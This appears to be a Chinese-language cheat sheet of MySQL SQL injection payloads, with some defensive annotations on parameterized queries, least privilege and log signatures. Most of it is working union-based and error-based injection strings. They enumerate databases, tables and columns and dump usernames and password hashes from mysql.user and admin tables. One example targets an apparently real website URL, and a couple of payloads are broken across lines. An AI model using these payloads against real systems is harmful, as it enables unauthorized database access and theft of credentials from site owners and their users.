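盲注查询(注:以下语句实际多为联合查询注入和报错注入,而非严格意义上的盲注):

防守方须知:这些语句全部依赖应用把请求参数直接拼接进 SQL 语句;改用参数化查询(预编译语句)后均不成立。请求参数中出现 union select、information_schema、name_const、floor(rand(0)*2) 等片段,可作为 Web 日志和 WAF 的检测特征。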



and (select count(*) from mysql.user)>0/*   查看权限:判断当前数据库账号能否读取 mysql.user 表(应用账号按最小权限配置、无权访问 mysql 库时,此查询失败)


1:system_user() 系统用户名

2:user()        用户名

3:current_user  当前用户名

4:session_user()连接数据库的用户名

5:database()    数据库名

6:version()     MYSQL数据库版本

7:load_file()   MYSQL读取服务器本地文件的函数(需要 FILE 权限,并受 secure_file_priv 限制;应用账号不应授予 FILE 权限)

8:@@datadir     数据库数据文件目录的路径

9:@@basedir    MYSQL 安装路径

10:@@version_compile_os   操作系统(MySQL 编译时的目标平台类型,如 Win32、Linux,并不是 “Windows Server 2003” 这类具体系统版本)



############################################################################################################


查看用户和密码(从 mysql.user 读取账号和口令哈希;仅当应用使用的数据库账号能读取 mysql 库时才成立,所以应用不应使用 root 等高权限账号连接数据库):


http://www.fly-er.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12+from+mysql.user


查看有多少列:select 。。。 from information_schema.SCHEMATA– (注:information_schema.SCHEMATA 中每行对应一个数据库,这里列出的是库名而不是列数)



查询当前用户(以下两种方法都属于报错注入:查询结果是通过数据库错误信息带出来的,因此只在应用向客户端回显数据库错误时有效;生产环境应关闭错误回显,只在服务端记录日志):

Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)


Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r

and(0)*2))x+from+information_schema.tables+group+by+x)a)







用户 数据库名称 数据库版本: 


and+substring(@@version,1,1)=4


and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13/* 


有时加上“/*” 会报错,所以此时需要去掉“/*”



#########################################    暴库     ######################################################


and 1=2 union select 1,2,SCHEMA_NAME,4,5,6,7,8,9,10,11 from information_schema.SCHEMATA limit 1,1/*

其中“limit 1,1” 中前面的数字“1”可以增加来查看多个库 (有时加上“/*” 会报错,所以此时需要去掉“/*”)


暴所有库:

+and+1=2+union+select+1,2,3,concat(GROUP_CONCAT(DISTINCT+table_schema)),5,6,7,8+from+information_schema.columns



读出所有库:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA



and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“LIMIT 0,1” 此处的0可看多个库




爆当前数据库

and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1






查询当前数据库:

Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)


Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo

or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)








####################################################################################################################################################################################################################################################################################################################################


####################################      快速爆表     #####################################################


爆所有表

and+1=2+union+select+1,group_concat(distinct+table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()



爆所有表

newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+table_name),8,9,10,11,12+from+information_schema.tables+where+table_schema=0x666C6965725F6462617365 或者=( database() )也行


and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*

有时加上“/*” 会报错,所以此时需要去掉“/*”



+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.tables+where+table_schema=0x697266+order+by+table_schema+limit+0,1)t+limit+1--

注:“table_schema=0x697266” 为上面查到的库的hex值  且“limit+0,1)”中的0可一直增加查看多个表



and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x70726F64756374 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“table_schema”后面的 “limit 0,1”中的0可爆多个表




####################################################################################################################################################################################################################################################################################################################################


##############################################      快速暴字段      ########################################


and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8 from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*

limit 的起始值从 0 开始递增,递增到 N 时浏览器返回错误,说明此表存在 N-1 个字段。


newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+column_name),8,9,10,11,12+from+information_schema.columns+where+table_name=0x7075625F7765626D6173746572



读出所有表字段:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)

注:char(97,100,109,105,110) 中的 97,100,109,105,110 为 admin 各字符的 ASCII 码,依次类推



and+1=2+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13+from+(select+*+from+information_schema.columns+where+table_name=爆出来的表名的hex值+and+table_schema=数据库名的hex值+order+by+1+limit+0,1)t+limit+1--

注:其中“limit+0,1)”中的0可以一直增加来查看多个字段



and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x70726F64756374 and table_name=0x61646D696E limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

修改“table_name”后面的“limit 0,1”可爆多个字段



####################################################################################################################################################################################################################################################################################################################################



#################################        查看字段内容:       #############################################


and+1=2+union+select+1,2,3,concat(md_pw),5,6,7,8,9,10,11,12,13+from+MemberData



newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT+username,0x5f,userpwd),8,9,10,11,12+from+pub_webmaster





and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*



union select 1,group_concat(username,0x3a,password),3,4,5... from 表(或表的hex值)



and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,admin.username,0x27,0x7e) from admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1